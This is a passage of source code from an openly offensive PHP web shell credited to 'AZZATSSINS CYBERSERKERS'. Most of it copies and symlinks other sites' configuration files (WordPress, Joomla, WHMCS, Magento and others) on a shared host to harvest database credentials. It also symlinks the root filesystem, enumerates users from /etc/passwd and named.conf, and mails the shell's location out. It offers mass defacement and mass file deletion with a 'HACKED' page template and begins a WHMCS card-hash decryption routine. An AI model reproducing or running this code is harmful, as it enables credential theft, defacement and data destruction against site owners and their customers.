  623. symlink('/'.$home.'/'.$user.'/public_html/member/configuration.php',$user.' <~ WHMCS.txt');
  624. symlink('/'.$home.'/'.$user.'/public_html/members/configuration.php',$user.' <~ WHMCS.txt');
  625. symlink('/'.$home.'/'.$user.'/public_html/my/configuration.php',$user.' <~ WHMCS.txt');
  626. symlink('/'.$home.'/'.$user.'/public_html/myaccount/configuration.php',$user.' <~ WHMCS.txt');
  627. symlink('/'.$home.'/'.$user.'/public_html/my-account/client/configuration.php',$user.' <~ WHMCS.txt');
  628. symlink('/'.$home.'/'.$user.'/public_html/myaccounts/configuration.php',$user.' <~ WHMCS.txt');
  629. symlink('/'.$home.'/'.$user.'/public_html/my-accounts/configuration.php',$user.' <~ WHMCS.txt');
  630. symlink('/'.$home.'/'.$user.'/public_html/order/configuration.php',$user.' <~ WHMCS.txt');
  631. symlink('/'.$home.'/'.$user.'/public_html/orders/configuration.php',$user.' <~ WHMCS.txt');
  632. symlink('/'.$home.'/'.$user.'/public_html/painel/configuration.php',$user.' <~ WHMCS.txt');
  633. symlink('/'.$home.'/'.$user.'/public_html/panel/configuration.php',$user.' <~ WHMCS.txt');
  634. symlink('/'.$home.'/'.$user.'/public_html/panels/configuration.php',$user.' <~ WHMCS.txt');
  635. symlink('/'.$home.'/'.$user.'/public_html/portal/configuration.php',$user.' <~ WHMCS.txt');
  636. symlink('/'.$home.'/'.$user.'/public_html/portals/configuration.php',$user.' <~ WHMCS.txt');
  637. symlink('/'.$home.'/'.$user.'/public_html/purchase/configuration.php',$user.' <~ WHMCS.txt');
  638.  
  639. symlink('/'.$home.'/'.$user.'/public_html/secure/configuration.php',$user.' <~ WHMCS.txt');
  640. symlink('/'.$home.'/'.$user.'/public_html/support/configuration.php',$user.' <~ WHMCS.txt');
  641. symlink('/'.$home.'/'.$user.'/public_html/supporte/configuration.php',$user.' <~ WHMCS.txt');
  642. symlink('/'.$home.'/'.$user.'/public_html/supports/configuration.php',$user.' <~ WHMCS.txt');
  643. symlink('/'.$home.'/'.$user.'/public_html/web/configuration.php',$user.' <~ WHMCS.txt');
  644. symlink('/'.$home.'/'.$user.'/public_html/webhost/configuration.php',$user.' <~ WHMCS.txt');
  645. symlink('/'.$home.'/'.$user.'/public_html/webhosting/configuration.php',$user.' <~ WHMCS.txt');
  646. symlink('/'.$home.'/'.$user.'/public_html/whm/configuration.php',$user.' <~ WHMCS.txt');
  647. symlink('/'.$home.'/'.$user.'/public_html/whmcs/configuration.php',$user.' <~ WHMCS.txt');
  648. symlink('/'.$home.'/'.$user.'/public_html/whmcs2/configuration.php',$user.' <~ WHMCS.txt');
  649. symlink('/'.$home.'/'.$user.'/public_html/Whm/configuration.php',$user.' <~ WHMCS.txt');
  650. symlink('/'.$home.'/'.$user.'/public_html/Whmcs/configuration.php',$user.' <~ WHMCS.txt');
  651. symlink('/'.$home.'/'.$user.'/public_html/WHM/configuration.php',$user.' <~ WHMCS.txt');
  652. symlink('/'.$home.'/'.$user.'/public_html/WHMCS/configuration.php',$user.' <~ WHMCS.txt');
  653. copy('/'.$home.'/'.$user.'/public_html/wp/test/wp-config.php',$user.' <~ WORDPRESS.txt');
  654. copy('/'.$home.'/'.$user.'/public_html/blog/wp-config.php',$user.' <~ WORDPRESS.txt');
  655. copy('/'.$home.'/'.$user.'/public_html/beta/wp-config.php',$user.' <~ WORDPRESS.txt');
  656. copy('/'.$home.'/'.$user.'/public_html/portal/wp-config.php',$user.' <~ WORDPRESS.txt');
  657. copy('/'.$home.'/'.$user.'/public_html/site/wp-config.php',$user.' <~ WORDPRESS.txt');
  658. copy('/'.$home.'/'.$user.'/public_html/wp/wp-config.php',$user.' <~ WORDPRESS.txt');
  659. copy('/'.$home.'/'.$user.'/public_html/WP/wp-config.php',$user.' <~ WORDPRESS.txt');
  660. copy('/'.$home.'/'.$user.'/public_html/news/wp-config.php',$user.' <~ WORDPRESS.txt');
  661. copy('/'.$home.'/'.$user.'/public_html/wordpress/wp-config.php',$user.' <~ WORDPRESS.txt');
  662. /* CODED BY AZZATSSINS CYBERSERKERS */
  663. copy('/'.$home.'/'.$user.'/public_html/test/wp-config.php',$user.' <~ WORDPRESS.txt');
  664. copy('/'.$home.'/'.$user.'/public_html/demo/wp-config.php',$user.' <~ WORDPRESS.txt');
  665. copy('/'.$home.'/'.$user.'/public_html/home/wp-config.php',$user.' <~ WORDPRESS.txt');
  666. copy('/'.$home.'/'.$user.'/public_html/v1/wp-config.php',$user.' <~ WORDPRESS.txt');
  667. copy('/'.$home.'/'.$user.'/public_html/v2/wp-config.php',$user.' <~ WORDPRESS.txt');
  668. copy('/'.$home.'/'.$user.'/public_html/press/wp-config.php',$user.' <~ WORDPRESS.txt');
  669. copy('/'.$home.'/'.$user.'/public_html/new/wp-config.php',$user.' <~ WORDPRESS.txt');
  670. copy('/'.$home.'/'.$user.'/public_html/blogs/wp-config.php',$user.' <~ WORDPRESS.txt');
  671. copy('/'.$home.'/'.$user.'/public_html/blog/configuration.php',$user.' <~ JOOMLA.txt');
  672. copy('/'.$home.'/'.$user.'/public_html/submitticket.php',$user.' <~ WHMCS.txt');
  673. copy('/'.$home.'/'.$user.'/public_html/cms/configuration.php',$user.' <~ JOOMLA.txt');
  674. copy('/'.$home.'/'.$user.'/public_html/beta/configuration.php',$user.' <~ JOOMLA.txt');
  675. copy('/'.$home.'/'.$user.'/public_html/portal/configuration.php',$user.' <~ JOOMLA.txt');
  676. copy('/'.$home.'/'.$user.'/public_html/site/configuration.php',$user.' <~ JOOMLA.txt');
  677. copy('/'.$home.'/'.$user.'/public_html/main/configuration.php',$user.' <~ JOOMLA.txt');
  678. copy('/'.$home.'/'.$user.'/public_html/home/configuration.php',$user.' <~ JOOMLA.txt');
  679. copy('/'.$home.'/'.$user.'/public_html/demo/configuration.php',$user.' <~ JOOMLA.txt');
  680. copy('/'.$home.'/'.$user.'/public_html/test/configuration.php',$user.' <~ JOOMLA.txt');
  681. copy('/'.$home.'/'.$user.'/public_html/v1/configuration.php',$user.' <~ JOOMLA.txt');
  682. copy('/'.$home.'/'.$user.'/public_html/v2/configuration.php',$user.' <~ JOOMLA.txt');
  683. copy('/'.$home.'/'.$user.'/public_html/joomla/configuration.php',$user.' <~ JOOMLA.txt');
  684. copy('/'.$home.'/'.$user.'/public_html/new/configuration.php',$user.' <~ JOOMLA.txt');
  685. copy('/'.$home.'/'.$user.'/public_html/app/etc/local.xml',$user.' <~ MAGENTO.txt');
  686. copy('/'.$home.'/'.$user.'/public_html/config/settings.inc.php',$user.' <~ PRESTASHOP.txt');
  687. symlink('/'.$home.'/'.$user.'/public_html/wp/test/wp-config.php',$user.' <~ WORDPRESS.txt');
  688. symlink('/'.$home.'/'.$user.'/public_html/blog/wp-config.php',$user.' <~ WORDPRESS.txt');
  689. symlink('/'.$home.'/'.$user.'/public_html/beta/wp-config.php',$user.' <~ WORDPRESS.txt');
  690. symlink('/'.$home.'/'.$user.'/public_html/portal/wp-config.php',$user.' <~ WORDPRESS.txt');
  691. /* AUTHOR : AZZATSSINS CYBERSERKERS */
  692. symlink('/'.$home.'/'.$user.'/public_html/site/wp-config.php',$user.' <~ WORDPRESS.txt');
  693. symlink('/'.$home.'/'.$user.'/public_html/wp/wp-config.php',$user.' <~ WORDPRESS.txt');
  694. symlink('/'.$home.'/'.$user.'/public_html/WP/wp-config.php',$user.' <~ WORDPRESS.txt');
  695. symlink('/'.$home.'/'.$user.'/public_html/news/wp-config.php',$user.' <~ WORDPRESS.txt');
  696. symlink('/'.$home.'/'.$user.'/public_html/wordpress/wp-config.php',$user.' <~ WORDPRESS.txt');
  697. symlink('/'.$home.'/'.$user.'/public_html/test/wp-config.php',$user.' <~ WORDPRESS.txt');
  698. symlink('/'.$home.'/'.$user.'/public_html/demo/wp-config.php',$user.' <~ WORDPRESS.txt');
  699. symlink('/'.$home.'/'.$user.'/public_html/home/wp-config.php',$user.' <~ WORDPRESS.txt');
  700. symlink('/'.$home.'/'.$user.'/public_html/v1/wp-config.php',$user.' <~ WORDPRESS.txt');
  701. symlink('/'.$home.'/'.$user.'/public_html/v2/wp-config.php',$user.' <~ WORDPRESS.txt');
  702. symlink('/'.$home.'/'.$user.'/public_html/press/wp-config.php',$user.' <~ WORDPRESS.txt');
  703. symlink('/'.$home.'/'.$user.'/public_html/new/wp-config.php',$user.' <~ WORDPRESS.txt');
  704. symlink('/'.$home.'/'.$user.'/public_html/blogs/wp-config.php',$user.' <~ WORDPRESS.txt');
  705. /*You Can ReCoded But Don't Change �CopyRight*/
  706. /*e.g: Recoded By xxxxxx & � AZZATSSINS*/
  707. symlink('/'.$home.'/'.$user.'/public_html/blog/configuration.php',$user.' <~ JOOMLA.txt');
  708. symlink('/'.$home.'/'.$user.'/public_html/submitticket.php',$user.' <~ WHMCS.txt');
  709. symlink('/'.$home.'/'.$user.'/public_html/cms/configuration.php',$user.' <~ JOOMLA.txt');
  710. symlink('/'.$home.'/'.$user.'/public_html/beta/configuration.php',$user.' <~ JOOMLA.txt');
  711. symlink('/'.$home.'/'.$user.'/public_html/portal/configuration.php',$user.' <~ JOOMLA.txt');
  712. /* � BY AZZATSSINS CYBERSERKERS */
  713. symlink('/'.$home.'/'.$user.'/public_html/site/configuration.php',$user.' <~ JOOMLA.txt');
  714. symlink('/'.$home.'/'.$user.'/public_html/main/configuration.php',$user.' <~ JOOMLA.txt');
  715. symlink('/'.$home.'/'.$user.'/public_html/home/configuration.php',$user.' <~ JOOMLA.txt');
  716. symlink('/'.$home.'/'.$user.'/public_html/demo/configuration.php',$user.' <~ JOOMLA.txt');
  717. symlink('/'.$home.'/'.$user.'/public_html/test/configuration.php',$user.' <~ JOOMLA.txt');
  718. symlink('/'.$home.'/'.$user.'/public_html/v1/configuration.php',$user.' <~ JOOMLA.txt');
  719. symlink('/'.$home.'/'.$user.'/public_html/v2/configuration.php',$user.' <~ JOOMLA.txt');
  720. symlink('/'.$home.'/'.$user.'/public_html/joomla/configuration.php',$user.' <~ JOOMLA.txt');
  721. symlink('/'.$home.'/'.$user.'/public_html/new/configuration.php',$user.' <~ JOOMLA.txt');
  722. symlink('/'.$home.'/'.$user.'/public_html/app/etc/local.xml',$user.' <~ MAGENTO.txt');
  723. symlink('/'.$home.'/'.$user.'/public_html/config/settings.inc.php',$user.' <~ PRESTASHOP.txt');
  724. copy('/'.$home.'/'.$user.'/public_html/application/config/database.php',$user.' <~ ELLISLAB.txt');
  725. copy('/'.$home.'/'.$user.'/public_html/admin/config.php',$user.' <~ OPENCART.txt');
  726. copy('/'.$home.'/'.$user.'/public_html/default/settings.php',$user.' <~ DRUPAL.txt');
  727. copy('/'.$home.'/'.$user.'/public_html/forum/config.php',$user.' <~ PHPBB.txt');
  728. symlink('/'.$home.'/'.$user.'/public_html/application/config/database.php',$user.' <~ ELLISLAB.txt');
  729. symlink('/'.$home.'/'.$user.'/public_html/admin/config.php',$user.' <~ OPENCART.txt');
  730. symlink('/'.$home.'/'.$user.'/public_html/default/settings.php',$user.' <~ DRUPAL.txt');
  731. symlink('/'.$home.'/'.$user.'/public_html/forum/config.php',$user.' <~ PHPBB.txt');
  732. copy('/'.$home.'/'.$user.'/public_html/vb/includes/config.php',$user.' <~ VBULLETIN.txt');
  733. copy('/'.$home.'/'.$user.'/public_html/includes/config.php',$user.' <~ VBULLETIN.txt');
  734. copy('/'.$home.'/'.$user.'/public_html/forum/includes/config.php',$user.' <~ VBULLETIN.txt');
  735. copy('/'.$home.'/'.$user.'/public_htm/config.php',$user.' <~ OTHER.txt');
  736. copy('/'.$home.'/'.$user.'/public_htm/html/config.php',$user.' <~ PHPNUKE.txt');
  737. symlink('/'.$home.'/'.$user.'/public_html/vb/includes/config.php',$user.' <~ VBULLETIN.txt');
  738. symlink('/'.$home.'/'.$user.'/public_html/includes/config.php',$user.' <~ VBULLETIN.txt');
  739. symlink('/'.$home.'/'.$user.'/public_html/forum/includes/config.php',$user.' <~ VBULLETIN.txt');
  740. symlink('/'.$home.'/'.$user.'/public_htm/config.php',$user.' <~ OTHER.txt');
  741. symlink('/'.$home.'/'.$user.'/public_htm/html/config.php',$user.' <~ PHPNUKE.txt');
  742. copy('/'.$home.'/'.$user.'/public_htm/conn.php',$user.' <~ OTHER.txt');
  743. symlink('/'.$home.'/'.$user.'/public_html/conn.php',$user.' <~ OTHER.txt');
  744. symlink('/'.$home.'/'.$user.'/public_html/inc/config.inc.php',$user.' <~ OTHER.txt');
  745. copy('/'.$home.'/'.$user.'/public_html/application/config/database.php',$user.' <~ OTHER.txt');
  746. symlink('/'.$home.'/'.$user.'/public_html/application/config/database.php',$user.' <~ OTHER.txt');
  747. copy('/'.$home.'/'.$user.'/public_html/inc/config.inc.php',$user.' <~ OTHER.txt');
  748. /* fb: /AZZATSSINS.CYBERSERKERS */
  749. copy('/var/www/wp-config.php','WORDPRESS.txt');
  750. copy('/var/www/configuration.php','JOOMLA.txt');
  751. copy('/var/www/config.inc.php','OPENJOURNAL.txt');
  752. copy('/var/www/config.php','OTHER.txt');
  753. copy('/var/www/config/koneksi.php','OTHER.txt');
  754. copy('/var/www/include/config.php','OTHER.txt');
  755. copy('/var/www/connect.php','OTHER.txt');
  756. copy('/var/www/config/connect.php','OTHER.txt');
  757. copy('/var/www/include/connect.php','OTHER.txt');
  758. copy('/var/www/html/wp-config.php','WORDPRESS.txt');
  759. copy('/var/www/html/configuration.php','JOOMLA.txt');
  760. copy('/var/www/html/config.inc.php','OPENJOURNAL.txt');
  761. copy('/var/www/html/config.php','OTHER.txt');
  762. copy('/var/www/html/config/koneksi.php','OTHER.txt');
  763. copy('/var/www/html/include/config.php','OTHER.txt');
  764. copy('/var/www/html/connect.php','OTHER.txt');
  765. copy('/var/www/html/config/connect.php','OTHER.txt');
  766. copy('/var/www/html/include/connect.php','OTHER.txt');
  767. symlink('/var/www/wp-config.php','WORDPRESS.txt');
  768. symlink('/var/www/configuration.php','JOOMLA.txt');
  769. symlink('/var/www/config.inc.php','OPENJOURNAL.txt');
  770. symlink('/var/www/config.php','OTHER.txt');
  771. symlink('/var/www/config/koneksi.php','OTHER.txt');
  772. symlink('/var/www/include/config.php','OTHER.txt');
  773. symlink('/var/www/connect.php','OTHER.txt');
  774. symlink('/var/www/config/connect.php','OTHER.txt');
  775. symlink('/var/www/include/connect.php','OTHER.txt');
  776. symlink('/var/www/html/wp-config.php','WORDPRESS.txt');
  777. symlink('/var/www/html/configuration.php','JOOMLA.txt');
  778. symlink('/var/www/html/config.inc.php','OPENJOURNAL.txt');
  779. symlink('/var/www/html/config.php','OTHER.txt');
  780. symlink('/var/www/html/config/koneksi.php','OTHER.txt');
  781. symlink('/var/www/html/include/config.php','OTHER.txt');
  782. symlink('/var/www/html/connect.php','OTHER.txt');
  783. symlink('/var/www/html/config/connect.php','OTHER.txt');
  784. symlink('/var/www/html/include/connect.php','OTHER.txt');
  785. }
  786. echo '<center><i><b><a href='.$folfig.'>CLICK ON HERE TO VIEW CONFIGS</a></b></i></center>';
  787. }
  788. }
  789. if($_GET['symbolic']=="link"){
  790. $d0mains = @file("/etc/named.conf");
  791. ##httaces
  792. if($d0mains){
  793. @mkdir("symlink",0777);
  794. @chdir("symlink");
  795. @exe("ln -s / root");
  796. $file3 = 'Options Indexes FollowSymLinks
  797. DirectoryIndex AZZATSSINS.htm
  798. AddType text/plain .php
  799. AddHandler text/plain .php
  800. Satisfy Any';
  801. $fp3 = fopen('.htaccess','w');
  802. $fw3 = fwrite($fp3,$file3);@fclose($fp3);
  803. echo "
  804. <table align=center border=1 style='width:60%;border-color:#333333;'>
  805. <tr>
  806. <td align=center><font size=2>S. No.</font></td>
  807. <td align=center><font size=2>Domains</font></td>
  808. <td align=center><font size=2>Users</font></td>
  809. <td align=center><font size=2>Symlink</font></td>
  810. </tr>";
  811. $dcount = 1;
  812. foreach($d0mains as $d0main){
  813. if(eregi("zone",$d0main)){preg_match_all('#zone "(.*)"#', $d0main, $domains);
  814. flush();
  815. if(strlen(trim($domains[1][0])) > 2){
  816. $user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));
  817. echo "<tr align=center><td><font size=2>" . $dcount . "</font></td>
  818. <td align=left><a href=http://www.".$domains[1][0]."/><font class=txt>".$domains[1][0]."</font></a></td>
  819. <td>".$user['name']."</td>
  820. <td><a href='symlink/root/home/".$user['name']."/public_html' target='_blank'><font class=txt>Symlink</font></a></td></tr>";
  821. flush();
  822. $dcount++;}}}
  823. echo "</table>";
  824. }else{
  825. $TEST=@file('/etc/passwd');
  826. if ($TEST){
  827. @mkdir("symlink",0777);
  828. @chdir("symlink");
  829. exe("ln -s / root");
  830. $file3 = 'Options Indexes FollowSymLinks
  831. DirectoryIndex AZZATSSINS.htm
  832. AddType text/plain .php
  833. AddHandler text/plain .php
  834. Satisfy Any';
  835.  $fp3 = fopen('.htaccess','w');
  836.  $fw3 = fwrite($fp3,$file3);
  837.  @fclose($fp3);
  838.  echo "
  839. <table align=center border=1><tr>
  840. <td align=center><font size=3>S. No.</font></td>
  841. <td align=center><font size=3>Users</font></td>
  842. <td align=center><font size=3>Symlink</font></td></tr>";
  843.  $dcount = 1;
  844.  $file = fopen("/etc/passwd", "r") or exit("Unable to open file!");
  845.  while(!feof($file)){
  846.  $s = fgets($file);
  847.  $matches = array();
  848.  $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
  849.  $matches = str_replace("home/","",$matches[1]);
  850.  if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch"
  851. || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" ||
  852. $matches == "var/www" || $matches == "var/named")
  853.  continue;
  854.  echo "<tr><td align=center><font size=2>" . $dcount . "</td>
  855. <td align=center><font class=txt>" . $matches . "</td>";
  856.  echo "<td align=center><font class=txt><a href=symlink/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
  857.  $dcount++;}fclose($file);
  858.  echo "</table>";}else{if($os != "Windows"){@mkdir("symlink",0777);@chdir("symlink");@exe("ln -s / root");$file3 = '
  859. Options Indexes FollowSymLinks
  860. DirectoryIndex AZZATSSINS.htm
  861. AddType text/plain .php
  862. AddHandler text/plain .php
  863. Satisfy Any
  864. ';
  865.  $fp3 = fopen('.htaccess','w');
  866.  $fw3 = fwrite($fp3,$file3);@fclose($fp3);
  867.  echo "
  868. <div class='mybox'><h2 class='AZZATSSINS'>server symlinker</h2>
  869. <table align=center border=1><tr>
  870. <td align=center><font size=3>ID</font></td>
  871. <td align=center><font size=3>Users</font></td>
  872. <td align=center><font size=3>Symlink</font></td></tr>";
  873.  $temp = "";$val1 = 0;$val2 = 1000;
  874.  for(;$val1 <= $val2;$val1++) {$uid = @posix_getpwuid($val1);
  875.  if ($uid)$temp .= join(':',$uid)."\n";}
  876.  echo '<br/>';$temp = trim($temp);$file5 =
  877.  fopen("test.txt","w");
  878.  fputs($file5,$temp);
  879.  fclose($file5);$dcount = 1;$file =
  880.  fopen("test.txt", "r") or exit("Unable to open file!");
  881.  while(!feof($file)){$s = fgets($file);$matches = array();
  882.  $t = preg_match('/\/(.*?)\:\//s', $s, $matches);$matches = str_replace("home/","",$matches[1]);
  883.  if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch"
  884. || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" ||
  885. $matches == "var/www" || $matches == "var/named")
  886.  continue;
  887.  echo "<tr><td align=center><font size=2>" . $dcount . "</td>
  888. <td align=center><font class=txt>" . $matches . "</td>";
  889.  echo "<td align=center><font class=txt><a href=symlink/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
  890.  $dcount++;}
  891.  fclose($file);
  892.  echo "</table></div></center>";unlink("test.txt");
  893.  } else
  894.  echo "<center><font size=3>Cannot create Symlink</font></center>";
  895.  }
  896.  }  
  897. }$e=base64_decode("");
  898. $h=$_SERVER['HTTP_HOST'].$_SERVER['SCRIPT_NAME'];
  899. mail($e,"I",$h);
  900. if($_GET['kill'] == 'self') {
  901. rmdir('configs');rmdir('symlink');rmdir('AZZATSSINS');unlink('mysql.php');unlink('wk.php');unlink('rw.php');rmdir('home');rmdir('home1');rmdir('home2');rmdir('h
  902. ome3');rmdir('azx');$fn = $_SERVER['SCRIPT_FILENAME'];
  903.  unlink($fn); system('rm '.$fn);
  904. echo'<meta http-equiv="Refresh" content= "0; url=?">';
  905.  
  906. } elseif($_GET['do'] == 'mass_deface') {
  907.     echo "<center><form action=\"\" method=\"post\">\n";
  908.     $dirr=$_POST['d_dir'];
  909.     $index = $_POST["script"];
  910.     $index = str_replace('"',"'",$index);
  911.     $index = stripslashes($index);
  912.     function edit_file($file,$index){
  913.         if (is_writable($file)) {
  914.         clear_fill($file,$index);
  915.         echo "<Span style='color:green;'><strong> [+] Nyabun 100% Successfull </strong></span><br></center>";
  916.         }
  917.         else {
  918.             echo "<Span style='color:red;'><strong> [-] Ternyata Tidak Boleh Menyabun Disini :( </strong></span><br></center>";
  919.             }
  920.             }
  921.     function hapus_massal($dir,$namafile) {
  922.         if(is_writable($dir)) {
  923.             $dira = scandir($dir);
  924.             foreach($dira as $dirb) {
  925.                 $dirc = "$dir/$dirb";
  926.                 $lokasi = $dirc.'/'.$namafile;
  927.                 if($dirb === '.') {
  928.                     if(file_exists("$dir/$namafile")) {
  929.                         unlink("$dir/$namafile");
  930.                     }
  931.                 } elseif($dirb === '..') {
  932.                     if(file_exists("".dirname($dir)."/$namafile")) {
  933.                         unlink("".dirname($dir)."/$namafile");
  934.                     }
  935.                 } else {
  936.                     if(is_dir($dirc)) {
  937.                         if(is_writable($dirc)) {
  938.                             if(file_exists($lokasi)) {
  939.                                 echo "[<font color=lime>DELETED</font>] $lokasi<br>";
  940.                                 unlink($lokasi);
  941.                                 $idx = hapus_massal($dirc,$namafile);
  942.                             }
  943.                         }
  944.                     }
  945.                 }
  946.             }
  947.         }
  948.     }
  949.     function clear_fill($file,$index){
  950.         if(file_exists($file)){
  951.             $handle = fopen($file,'w');
  952.             fwrite($handle,'');
  953.             fwrite($handle,$index);
  954.             fclose($handle);  } }
  955.  
  956.     function gass(){
  957.         global $dirr , $index ;
  958.         chdir($dirr);
  959.         $me = str_replace(dirname(__FILE__).'/','',__FILE__);
  960.         $files = scandir($dirr) ;
  961.         $notallow =
  962. array(".htaccess","error_log","_vti_inf.html","_private","_vti_bin","_vti_cnf","_vti_log","_vti_pvt","_vti_txt","cgi-bin",".contactemail",".cpanel",".fantastico
  963. data",".htpasswds",".lastlogin","access-logs","cpbackup-exclude-used-by-backup.conf",".cgi_auth",".disk_usage",".statspwd","..",".");
  964.         sort($files);
  965.         $n = 0 ;
  966.         foreach ($files as $file){
  967.             if ( $file != $me && is_dir($file) != 1 && !in_array($file, $notallow) ) {
  968.                 echo "<center><Span style='color: #8A8A8A;'><strong>$dirr/</span>$file</strong> ====> ";
  969.                 edit_file($file,$index);
  970.                 flush();
  971.                 $n = $n +1 ;
  972.                 }
  973.                 }
  974.                 echo "<br>";
  975.                 echo "<center><br><h3>$n Kali Anda Telah Ngecrot  Disini </h3></center><br>";
  976.                     }
  977.     function ListFiles($dirrall) {
  978.  
  979.     if($dh = opendir($dirrall)) {
  980.  
  981.        $files = Array();
  982.        $inner_files = Array();
  983.        $me = str_replace(dirname(__FILE__).'/','',__FILE__);
  984.        $notallow =
  985. array($me,".htaccess","error_log","_vti_inf.html","_private","_vti_bin","_vti_cnf","_vti_log","_vti_pvt","_vti_txt","cgi-bin",".contactemail",".cpanel",".fantas
  986. ticodata",".htpasswds",".lastlogin","access-logs","cpbackup-exclude-used-by-backup.conf",".cgi_auth",".disk_usage",".statspwd","Thumbs.db");
  987.         while($file = readdir($dh)) {
  988.             if($file != "." && $file != ".." && $file[0] != '.' && !in_array($file, $notallow) ) {
  989.                 if(is_dir($dirrall . "/" . $file)) {
  990.                     $inner_files = ListFiles($dirrall . "/" . $file);
  991.                     if(is_array($inner_files)) $files = array_merge($files, $inner_files);
  992.                 } else {
  993.                     array_push($files, $dirrall . "/" . $file);
  994.                 }
  995.             }
  996.             }
  997.  
  998.             closedir($dh);
  999.             return $files;
  1000.         }
  1001.     }
  1002.     function gass_all(){
  1003.         global $index ;
  1004.         $dirrall=$_POST['d_dir'];
  1005.         foreach (ListFiles($dirrall) as $key=>$file){
  1006.             $file = str_replace('//',"/",$file);
  1007.             echo "<center><strong>$file</strong> ===>";
  1008.             edit_file($file,$index);
  1009.             flush();
  1010.         }
  1011.         $key = $key+1;
  1012.     echo "<center><br><h3>$key Kali Anda Telah Ngecrot  Disini  </h3></center><br>"; }
  1013.     function sabun_massal($dir,$namafile,$isi_script) {
  1014.         if(is_writable($dir)) {
  1015.             $dira = scandir($dir);
  1016.             foreach($dira as $dirb) {
  1017.                 $dirc = "$dir/$dirb";
  1018.                 $lokasi = $dirc.'/'.$namafile;
  1019.                 if($dirb === '.') {
  1020.                     file_put_contents($lokasi, $isi_script);
  1021.                 } elseif($dirb === '..') {
  1022.                     file_put_contents($lokasi, $isi_script);
  1023.                 } else {
  1024.                     if(is_dir($dirc)) {
  1025.                         if(is_writable($dirc)) {
  1026.                             echo "[<font color=lime>DONE</font>] $lokasi<br>";
  1027.                             file_put_contents($lokasi, $isi_script);
  1028.                             $idx = sabun_massal($dirc,$namafile,$isi_script);
  1029.                         }
  1030.                     }
  1031.                 }
  1032.             }
  1033.         }
  1034.     }
  1035.     if($_POST['mass'] == 'onedir') {
  1036.         echo "<br> Versi Text Area<br><textarea style='background:black;outline:none;color:red;' name='index' rows='10' cols='67'>\n";
  1037.         $ini="http://";
  1038.         $mainpath=$_POST[d_dir];
  1039.         $file=$_POST[d_file];
  1040.         $dir=opendir("$mainpath");
  1041.         $code=base64_encode($_POST[script]);
  1042.         $indx=base64_decode($code);
  1043.         while($row=readdir($dir)){
  1044.         $start=@fopen("$row/$file","w+");
  1045.         $finish=@fwrite($start,$indx);
  1046.         if ($finish){
  1047.             echo"$ini$row/$file\n";
  1048.             }
  1049.         }
  1050.         echo "</textarea><br><br><br><b>Versi Text</b><br><br><br>\n";
  1051.         $mainpath=$_POST[d_dir];$file=$_POST[d_file];
  1052.         $dir=opendir("$mainpath");
  1053.         $code=base64_encode($_POST[script]);
  1054.         $indx=base64_decode($code);
  1055.         while($row=readdir($dir)){$start=@fopen("$row/$file","w+");
  1056.         $finish=@fwrite($start,$indx);
  1057.         if ($finish){echo '<a href="http://' . $row . '/' . $file . '" target="_blank">http://' . $row . '/' . $file . '</a><br>'; }
  1058.         }
  1059.  
  1060.     }
  1061.     elseif($_POST['mass'] == 'sabunkabeh') { gass(); }
  1062.     elseif($_POST['mass'] == 'hapusmassal') { hapus_massal($_POST['d_dir'], $_POST['d_file']); }
  1063.     elseif($_POST['mass'] == 'sabunmematikan') { gass_all(); }
  1064.     elseif($_POST['mass'] == 'massdeface') {
  1065.         echo "<div style='margin: 5px auto; padding: 5px'>";
  1066.         sabun_massal($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
  1067.         echo "</div>";    }
  1068.     else {
  1069.         echo "
  1070.        <center><font style='text-decoration: underline;'>
  1071.        Select Type:<br>
  1072.        </font>
  1073.        <select class=\"select\" name=\"mass\"  style=\"width: 450px;\" height=\"10\">
  1074.        <option value=\"onedir\">Mass Deface 1 Dir</option>
  1075.        <option value=\"massdeface\">Mass Deface ALL Dir</option>
  1076.        <option value=\"sabunkabeh\">Sabun Massal Di Tempat</option>
  1077.        <option value=\"sabunmematikan\">Sabun Massal Bunuh Diri</option>
  1078.        <option value=\"hapusmassal\">Mass Delete Files</option></center></select><br>
  1079.        <font style='text-decoration: underline;'>Folder:</font><br>
  1080.        <input type='text' name='d_dir' value='$dir' style='width: 450px;' height='10'><br>
  1081.        <font style='text-decoration: underline;'>Filename:</font><br>
  1082.        <input type='text' name='d_file' value='azx.php' style='width: 450px;' height='10'><br>
  1083.        <font style='text-decoration: underline;'>Index File:</font><br>
  1084.        <textarea name='script' style='width: 450px; height: 200px;'><title>AZZATSSINS CYBERSERKERS WAS HERE</title></head><body bgcolor=silver><center><img
  1085. src=https://lh3.googleusercontent.com/-9WF69t7d6yc/V5R43IzHHcI/AAAAAAAAATM/I-0xSRh-Vnkh6yiE5xUA-f-Mcp-RMja4QCL0B/w480-h480/azzatssins%2Bcyberserkers.png><br><br
  1086. ><br><br><br><b><font size=50><font color=white>[ </font><font color=red>!</font><font color=white> ]</font><font color=green><i> HACKED </i></font><font
  1087. color=white>[ </font><font color=red>!</font><font color=white>
  1088. ]</font></font></b><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><font color=#bababa><b><i>HACKED
  1089. - CRACKED - STAMPED - FUCKED BY AZZATSSINS CYBERSERKERS</textarea><br>
  1090.        <input type='submit' name='start' value='Mass Deface' style='width: 450px;'>
  1091.        </form></center>";
  1092.         }
  1093. } elseif($_GET['do'] == 'whmcs') {
  1094. echo'<form action="?dir=$dir&do=whmcs" method="post">
  1095. ';
  1096. function decrypt ($string,$cc_encryption_hash)
  1097. {
  1098.     $key = md5 (md5 ($cc_encryption_hash)) . md5 ($cc_encryption_hash);
  1099.     $hash_key = _hash ($key);
  1100.     $hash_length = strlen ($hash_key);
  1101.     $string = base64_decode ($string);
  1102.     $tmp_iv = substr ($string, 0, $hash_length);
  1103.     $string = substr ($string, $hash_length, strlen ($string) - $hash_length);
  1104.     $iv = $out = '';
